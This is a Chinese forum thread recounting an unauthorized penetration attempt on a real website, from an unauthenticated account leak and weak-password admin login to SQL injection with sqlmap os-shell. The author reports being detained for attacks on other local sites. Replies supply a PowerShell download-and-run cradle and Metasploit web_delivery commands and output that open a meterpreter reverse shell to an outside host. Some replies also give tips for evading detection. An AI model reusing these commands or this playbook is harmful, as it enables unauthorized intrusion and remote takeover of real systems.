一次实战(未完)

拿到目标站点后对其进行简单扫描。

扫描后发现一个URL有明显的显示异常,滞停了一下
0001
用Burp访问SysUser.aspx后发现Response返回是系统账户?
一处未授权吗?


往下翻后发现账户信息泄露

配合123456弱口令成功的杀进后台,由于文章是后续补的没有后台的截图,在后台上传图片处把dc_=1512512256加上一个数字或者去掉一个数字后发现路径

然后接着突破上传,什么方法都试过还是不行。

最后按照不符合windows文件规则方法试了一下。
参考:https://www.freebuf.com/column/196404.html
在文件后缀加上个“.”上传后提示未能隐射路径,这里希望大佬们指教一下这是什么情况。

无解,接下来回到后台继续找突破,找了很久在“查询”处发现一处post注入,既然还是最高权限。


精神来了,配合之前得到的路径用sqlmap执行os-shell 命令echo一句话,结果提示如下

发现是<未闭合的原因,本地测试命令没问题后继续echo,发现可能是路径不对的原因还是写不进去


到此结束,放弃了。

总结一下:

放弃的原因:原因是站点比较铭感,未授权,不然以shell的最高权限应该还是能拿到的webshell的 。

后台post注入:后台post注入利用比较奇葩,有时效性的可能是cookies的原因,等待一段时间之后就不行了,又要重新抓包。

最终的放弃原因:
九月2-3号渗透的,3号下午4点左右我被地方派出所联合当地网警抓了,被抓的原因并不是这个站,而是其他几个当地的平台,被抓后14号出来,行政拘留十天。文章也是我出来以后发布的,期间时间太长了很多忘记了。

在这里奉劝大家,不要未经授权渗透,特别是大陆的实在是手痒或者能力强可以玩玩国外的,被抓也是自己大意,内网漫游既然膨胀不上代理做跳板。

1 个赞

还算是小事,未经授权的站点还是别碰了,搞点研究挺好的

嗯,现在都不敢碰

1 个赞

既然能执行命令,可以直接powershell弹msf,路径问题就是SQLMAP对中文路径会乱码

明白了,谢谢大佬。

可是怎么上传msf生成的powershell呢?

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.217.162/7788.ps1‘);xx.ps1"

msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set target 2
target => 2
msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/script/web_delivery) > set LPORT 4455
LPORT => 4455
msf5 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4455
[*] Using URL: http://0.0.0.0:8080/kzwrDk2Sw56Et
[*] Local IP: http://1.1.1.1:8080/kzwrDk2Sw56Et
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $S=new-object net.webclient;$S.proxy=[Net.WebRequest]::GetSystemWebProxy();$S.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $S.downloadstring('http://1.1.1.1:8080/kzwrDk2Sw56Et');

生成后,直接执行:

powershell.exe -nop -w hidden -c $S=new-object net.webclient;$S.proxy=[Net.WebRequest]::GetSystemWebProxy();$S.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $S.downloadstring('http://1.1.1.1:8080/kzwrDk2Sw56Et');
2 个赞

感谢

我现在遇到这种sa的都是直接cs上线,写webshell太麻烦了

以后挂上SS 虚拟机定期还原 硬盘锁
像这种能执行命令的都可以直接上马了
像windows的我一般都尝试文件名+空格

你是不知道当今的图像还原技术有多么的成熟

十天。。。 翻你电脑硬盘了吗啊??

......秀啊 做好代理

看截图这个网站挺敏感,建议不要继续,且行且珍惜